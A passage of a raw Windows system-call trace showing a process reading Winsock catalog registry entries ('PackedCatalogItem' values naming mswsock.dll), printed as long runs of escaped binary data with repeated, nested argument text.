0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0v\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0w\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 00628   748   NtClose  (80, ... ) == 0x0
 00629   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000015"}, ... 80, ) }, ... 80, ) == 0x0
 00630   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00631   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00632   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\33\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\08\0A\0D\04\0D\08\00\06\0-\00\08\01\0B\0-\04\04\04\06\0-\0A\0\0\0\0\0\204\3\0\0y\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0y\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0z\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\06\0z\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0{\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0{\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0|\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\33\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\08\0A\0D\04\0D\08\00\06\0-\00\08\01\0B\0-\04\04\04\06\0-\0A\0\0\0\0\0\204\3\0\0y\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0y\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0z\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\06\0z\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0{\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0{\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0|\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0{\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0|\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0 (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\33\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\08\0A\0D\04\0D\08\00\06\0-\00\08\01\0B\0-\04\04\04\06\0-\0A\0\0\0\0\0\204\3\0\0y\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0y\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0z\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\06\0z\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0{\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0{\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0|\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 00633   748   NtClose  (80, ... ) == 0x0
 00634   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000016"}, ... 80, ) }, ... 80, ) == 0x0
 00635   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00636   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00637   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\34\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\08\0A\0D\04\0D\08\00\06\0-\00\08\01\0B\0-\04\04\04\06\0-\0A\0\0\0\0\0\204\3\0\0~\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0~\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\177\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\07\0\177\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0\200\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\200\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\201\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\34\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\08\0A\0D\04\0D\08\00\06\0-\00\08\01\0B\0-\04\04\04\06\0-\0A\0\0\0\0\0\204\3\0\0~\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0~\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\177\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\07\0\177\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0\200\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\200\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\201\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\200\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\201\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0 (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\34\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\08\0A\0D\04\0D\08\00\06\0-\00\08\01\0B\0-\04\04\04\06\0-\0A\0\0\0\0\0\204\3\0\0~\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0~\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\177\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\07\0\177\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0\200\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\200\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\201\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 00638   748   NtClose  (80, ... ) == 0x0
 00639   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000017"}, ... 80, ) }, ... 80, ) == 0x0
 00640   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00641   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00642   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\35\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\376\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0E\05\05\09\0B\00\0C\01\0-\0F\0A\04\06\0-\04\06\04\0D\0-\0B\0\0\0\0\0\204\3\0\0\203\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0\203\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\204\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\08\0\204\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0\205\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\205\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\206\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\35\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\376\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0E\05\05\09\0B\00\0C\01\0-\0F\0A\04\06\0-\04\06\04\0D\0-\0B\0\0\0\0\0\204\3\0\0\203\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0\203\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\204\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\08\0\204\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0\205\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\205\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\206\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\205\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\206\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0 (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\35\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\376\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 